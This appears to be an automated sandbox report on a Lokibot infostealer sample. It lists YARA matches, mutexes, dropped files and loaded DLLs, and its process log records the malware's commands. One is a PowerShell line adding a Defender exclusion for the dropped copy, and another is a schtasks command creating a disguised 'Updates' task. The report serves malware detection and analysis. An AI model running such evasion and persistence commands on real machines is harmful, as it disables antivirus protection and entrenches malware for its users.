              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: LEmJJ87mUQ.exe PID: 5016, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 2568, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: LEmJJ87mUQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: aWBoUwiux.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, L8Zd5QMXQQ43AtbYpO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, L8Zd5QMXQQ43AtbYpO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.csSecurity API names: _0020.AddAccessRule
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/16@1/1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,8_2_0040650A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,8_2_0040434D
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeFile created: C:\Users\user\AppData\Roaming\aWBoUwiux.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5572
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeMutant created: \Sessions\1\BaseNamedObjects\qaGvzjJwXCfFEpcoT
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE3D.tmpJump to behavior
              Source: LEmJJ87mUQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: LEmJJ87mUQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: LEmJJ87mUQ.exeReversingLabs: Detection: 55%
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeFile read: C:\Users\user\Desktop\LEmJJ87mUQ.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\LEmJJ87mUQ.exe "C:\Users\user\Desktop\LEmJJ87mUQ.exe"
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\aWBoUwiux.exe C:\Users\user\AppData\Roaming\aWBoUwiux.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1788
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: slc.dllJump to behavior
